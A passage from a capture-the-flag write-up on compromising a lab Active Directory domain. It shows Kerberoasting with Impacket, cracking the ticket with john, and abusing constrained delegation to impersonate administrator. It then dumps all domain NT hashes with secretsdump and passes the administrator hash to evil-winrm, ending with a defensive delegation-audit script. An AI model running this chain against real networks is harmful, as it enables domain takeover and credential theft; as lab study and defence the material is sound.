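index: 0xfda RID: 0x461 acb: 0x00000210 Account: admCroccCrew Name: admCroccCrew Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access
index: 0xf0f RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfd4 RID: 0x45b acb: 0x00020010 Account: mark Name: Mark Desc: (null)
index: 0xfe8 RID: 0x46e acb: 0x00040210 Account: password-reset Name: reset Desc: (null)
"""

if __name__ == "__main__":
    for account, hits in audit(SAMPLE).items():
        print(account)
        for hit in hits:
            print("  -", hit)
```

Run against the full listing, every enabled account on this box comes back with DONT_EXPIRE_PASSWORD, and only password-reset with the protocol-transition flag.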
Let's try GetUserSPNs to see if we can find a service account to abuse:

```
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name            MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------  --------------  --------  --------------------------  --------------------------  -----------
HTTP/dc.cooctus.corp  password-reset            2021-06-08 23:00:39.356663  2021-06-08 22:46:23.369540  constrained
```

And we retrieved a hash too:

```
rob:CroccCrew/ $ cat TGS.txt
$krb5tgs$23$*password-reset$COOCTUS.CORP$COOCTUS.CORP/password-reset*$4024001208a3bc13b06e873d2dac6a8f$[...]
```

Let's see if we can crack this now using john:

```
rob:CroccCrew/ $ john TGS.txt -w=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
resetpassword    (?)
1g 0:00:00:00 DONE (2021-09-24 00:16) 5.000g/s 1187Kp/s 1187Kc/s 1187KC/s rikelme..nichel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Excellent, we have new creds, password-reset:resetpassword. What can we do with this though?

Cue a lot of research as my AD attack knowledge is woefully lacking! Found a very good youtube video here.

Going back over our findings so far highlights something that looked interesting:

```
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name            MemberOf  PasswordLastSet             LastLogon                   Delegation
--------------------  --------------  --------  --------------------------  --------------------------  -----------
HTTP/dc.cooctus.corp  password-reset            2021-06-08 23:00:39.356663  2021-06-08 22:46:23.369540  constrained
```

We can see a 'constrained' value in the 'Delegation' column. This connects up with something we saw earlier in our LDAP enumeration: the account password-reset had a flag that no other domain user had, TRUSTED_TO_AUTH_FOR_DELEGATION.

Some more googling finds a good article on this:

> When constrained delegation is set on an account, two things happen under the covers: The userAccountControl attribute for the object gets updated with the "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION" flag and

and all the pieces I would want to exploit constrained delegation:

> - A compromised account configured with constrained delegation
> - A target privileged account to impersonate when requesting access to the service
> - Information on the machine hosting the service I'll be gaining access to

So, we have a compromised account with constrained delegation. We could simply aim high and try impersonating the administrator account, and we know most things about the target machine, so let's try using this information.

First they use a tool called kekeo to get the 'TGT', the "Ticket Granting Ticket". We should be able to do the same thing with impacket again:

```
rob:CroccCrew/ $ impacket-getTGT COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Saving ticket in password-reset.ccache
```

Ok, so far so good.
Next they use this TGT to impersonate another user; again we have an impacket option for this:

```
rob:CroccCrew/ $ impacket-getST -spn HTTP/dc.cooctus.corp -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user password-reset or initial TGT not forwardable
```

The SPN value is a bit of a guess; it is what we got in the output of our GetUserSPNs command earlier. Back to google again!

We find another tool, findDelegation, that shows us exactly what the constrained privileges we have are:

```
rob:CroccCrew/ $ impacket-findDelegation -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

AccountName     AccountType  DelegationType                      DelegationRightsTo
--------------  -----------  ----------------------------------  -----------------------------------
password-reset  Person       Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP/COOCTUS.CORP
password-reset  Person       Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP
password-reset  Person       Constrained w/ Protocol Transition  oakley/DC
password-reset  Person       Constrained w/ Protocol Transition  oakley/DC.COOCTUS.CORP/COOCTUS
password-reset  Person       Constrained w/ Protocol Transition  oakley/DC/COOCTUS
```

When we try this new information in place of the SPN name we seem to get a little further:

```
rob:CroccCrew/ $ impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
```

Excellent, with the administrator ticket we should now be able to extract the admin hash with secretsdump:

```
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
```

Of course, nothing is ever easy, is it! Turning on debug and specifying the target host gives us a little more information:

```
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass -debug COOCTUS.CORP/administrator@10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/COOCTUS.CORP@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache.
[+] Trying to connect to KDC at 10.10.145.144
[+] Trying to connect to KDC at 10.10.145.144
[+] SMBConnection didn't work, hoping Kerberos will help (Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid))
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[+] Exiting NTDSHashes.dump() because SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)
[*] Cleaning up...
```

These lines are interesting:

```
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
```

So is the address of the Domain Controller written into the ticket? Or rather the name, I guess? The DC name used in the getST command was DC.COOCTUS.CORP, so perhaps if we add that to our hosts file?
In a real life scenario it would of course be resolvable by DNS rob:CroccCrew/ $ impacket-secretsdump -k -no-pass DC.COOCTUS.CORP Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0xe748a0def7614d3306bd536cdc51bebe [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC COOCTUS\DC$:plain_password_hex:20e32c4c2471c0730dd322a4cd1068bebb17034932676917c1375b18d0fb2ab5710da01b79a6bef1a5a88ffc6946b710114ea28826d1dc889b67d29c4492ce3f0cbff2f11c8f13237832264563ae3ea81d53d9abd4c33f71d123df4a7f187af042e0c5b8d30ef19d0f038d855a7bc12f5f032a03bc13b3d2a2af91adfeb0391e6410ef4922e6a56d1b94ca9ef6ccbec53b7c685b091f2b60374529d85f79a0b0ccbaefb7fb0f61d623fa13a490ac385a0943b31ff6d4f604ad6569c593f9b112aa8fa4d746a4001d91ebf8b0dcfbd3cf5363ea370a347ea7aaf55e27f359f621986ee488059251efefee4b9c790910ea COOCTUS\DC$:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1::: [*] DPAPI_SYSTEM dpapi_machinekey:0xdadf91990ade51602422e8283bad7a4771ca859b dpapi_userkey:0x95ca7d2a7ae7ce38f20f1b11c22a05e5e23b321b [*] NL$KM 0000 D5 05 74 5F A7 08 35 EA EC 25 41 2C 20 DC 36 0C ..t_..5..%A, .6. 0010 AC CE CB 12 8C 13 AC 43 58 9C F7 5C 88 E4 7A C3 .......CX..\..z. 0020 98 F2 BB EC 5F CB 14 63 1D 43 8C 81 11 1E 51 EC ...._..c.C....Q. 
0030 66 07 6D FB 19 C4 2C 0E 9A 07 30 2A 90 27 2C 6B f.m...,...0*.',k NL$KM:d505745fa70835eaec25412c20dc360caccecb128c13ac43589cf75c88e47ac398f2bbec5fcb14631d438c81111e51ec66076dfb19c42c0e9a07302a90272c6b [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:'aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d'::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e::: COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1::: COOCTUS.CORP\mark:1115:aad3b435b51404eeaad3b435b51404ee:0b5e04d90dcab62cc0658120848244ef::: COOCTUS.CORP\Jeff:1116:aad3b435b51404eeaad3b435b51404ee:1004ed2b099a7c8eaecb42b3d73cc9b7::: COOCTUS.CORP\Spooks:1117:aad3b435b51404eeaad3b435b51404ee:07148bf4dacd80f63ef09a0af64fbaf9::: COOCTUS.CORP\Steve:1119:aad3b435b51404eeaad3b435b51404ee:2ae85453d7d606ec715ef2552e16e9b0::: COOCTUS.CORP\Howard:1120:aad3b435b51404eeaad3b435b51404ee:65340e6e2e459eea55ae539f0ec9def4::: COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a::: COOCTUS.CORP\Fawaz:1122:aad3b435b51404eeaad3b435b51404ee:d342c532bc9e11fc975a1e7fbc31ed8c::: COOCTUS.CORP\karen:1123:aad3b435b51404eeaad3b435b51404ee:e5810f3c99ae2abb2232ed8458a61309::: COOCTUS.CORP\cryillic:1124:aad3b435b51404eeaad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf::: COOCTUS.CORP\yumeko:1125:aad3b435b51404eeaad3b435b51404ee:c0e0e39ac7cab8c57c3543c04c340b49::: COOCTUS.CORP\pars:1126:aad3b435b51404eeaad3b435b51404ee:fad642fb63dcc57a24c71bdc47e55a05::: COOCTUS.CORP\kevin:1127:aad3b435b51404eeaad3b435b51404ee:48de70d96bf7b6874ec195cd5d389a09::: COOCTUS.CORP\jon:1128:aad3b435b51404eeaad3b435b51404ee:7f828aaed37d032d7305d6d5016ccbb3::: COOCTUS.CORP\Varg:1129:aad3b435b51404eeaad3b435b51404ee:7da62b00d4b258a03708b3c189b41a7e::: 
COOCTUS.CORP\evan:1130:aad3b435b51404eeaad3b435b51404ee:8c4b625853d78e84fb8b3c4bcd2328c5::: COOCTUS.CORP\Ben:1131:aad3b435b51404eeaad3b435b51404ee:1ce6fec89649608d974d51a4d6066f12::: COOCTUS.CORP\David:1132:aad3b435b51404eeaad3b435b51404ee:f863e27063f2ccfb71914b300f69186a::: COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1::: [*] Kerberos keys grabbed --snip-- [*] Cleaning up... We should be able to use evil-winrm now to pass this administrator hash (just the second half after the ‘:') and get a shell (finally!!) rob:CroccCrew/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.145.144 -u administrator -H 'add41095f1fb0405b32f70a489de022d' -n Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents whoami cooctus\administrator We use -n to specify no colours as this often messes up the command prompt Backtracking as Administrator As we’ve jumped here straight to administrator, which was our foothold was SO long and most probably not the intended method, we have to backtrack now to find the flags for the other key users We can start with a quick search for the usual suspect *Evil-WinRM* PS C:\Users\admCroccCrew Get-Childitem -Path C:\ -Include *user*.txt* -File -Recurse -ErrorAction SilentlyContinue Directory: C:\Shares\Home Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/7/2021 8:14 PM 17 user.txt *Evil-WinRM* PS C:\Users\admCroccCrew type C:\Shares\Home\user.txt THM{REDACTED} Ahh, that’s just the same flag again in the SMB share! 
However we do find some more useful files in that same directory (which presumably with the appropriate user access rights we could have seen via SMB) *Evil-WinRM* PS C:\Shares\Home dir Directory: C:\Shares\Home Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/8/2021 12:38 PM 28 priv-esc-2.txt -a---- 6/7/2021 8:08 PM 22 priv-esc.txt -a---- 6/7/2021 8:14 PM 17 user.txt So we can get #3 *Evil-WinRM* PS C:\Shares\Home cat priv-esc.txt THM{0n-Y0ur-Way-t0-DA} And #4 *Evil-WinRM* PS C:\Shares\Home cat priv-esc-2.txt THM{Wh4t-t0-d0...Wh4t-t0-d0} Lastly let’s do a search again for the root flag, #5 *Evil-WinRM* PS C:\Shares\Home Get-Childitem -Path / -Include root.txt -File -Recurse -ErrorAction SilentlyContinue Directory: C:\PerfLogs\Admin Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/7/2021 8:07 PM 22 root.txt And we finish the box with *Evil-WinRM* PS C:\Shares\Home type C:\PerfLogs\Admin\root.txt THM{REDACTED} NB: Reading through the writeups after the event, mainly to see if there was a more intended route than going directly to administrator, one of the writeups (by chrismeistre) had a great link that’s worth noting here for future reference. Also below is another link worth reading, cited by the first author as their main reference (also a perfect domain name! 😄) http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
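Looking back at the findDelegation step, the whole chain hinged on a plain user account (password-reset, type "Person") being trusted for constrained delegation with protocol transition to a service on the DC, and on administrator not being marked as sensitive. The following added audit script (not from the writeup or from Impacket) reads the two LDAP attributes behind that findDelegation output, userAccountControl and msDS-AllowedToDelegateTo, from plain dicts and flags exactly those conditions; the entries and the "privileged" flag are constructed for the example.

```python
"""Audit constrained-delegation settings of the kind findDelegation reported.

Added example, not code from the writeup or from Impacket. Entries are dicts
holding the LDAP attributes userAccountControl and msDS-AllowedToDelegateTo;
the sample entries at the bottom are constructed, not real directory data.
"""

TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2self for any user)
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account


def spn_host(spn):
    """Lowercase short host name from 'class/host[:port][/name]', e.g. oakley/DC.COOCTUS.CORP -> dc."""
    host = spn.split("/", 1)[1].split("/", 1)[0].split(":", 1)[0]
    return host.lower().split(".", 1)[0]


def audit_delegation(entries, dc_hosts):
    """Map sAMAccountName -> list of findings; an empty list means nothing to report."""
    dc_hosts = {h.lower().split(".", 1)[0] for h in dc_hosts}
    report = {}
    for e in entries:
        uac = int(e.get("userAccountControl", 0))
        targets = e.get("msDS-AllowedToDelegateTo", [])
        findings = []
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings.append("unconstrained delegation on a non-DC account")
        if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append("protocol transition: can obtain service tickets for any user not "
                            "marked sensitive, without that user ever authenticating")
        for spn in targets:
            if spn_host(spn) in dc_hosts:
                findings.append(f"constrained delegation to a DC service ({spn}); treat as Tier 0")
        # 'privileged' is a constructed flag standing in for admin group membership / adminCount.
        if e.get("privileged") and not uac & NOT_DELEGATED:
            findings.append("privileged account not marked 'sensitive and cannot be delegated'")
        report[e["sAMAccountName"]] = findings
    return report


# Constructed sample mirroring the shape of the writeup's COOCTUS.CORP accounts.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "password-reset", "userAccountControl": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["oakley/DC.COOCTUS.CORP", "oakley/DC"]},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "privileged": True},
    {"sAMAccountName": "DC$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
]

if __name__ == "__main__":
    for name, findings in audit_delegation(SAMPLE_ENTRIES, {"DC.COOCTUS.CORP"}).items():
        print(name, "->", findings or ["ok"])
```

Marking privileged accounts as sensitive (or placing them in Protected Users) is what would have stopped the S4U2self step for administrator here, independent of how password-reset was configured.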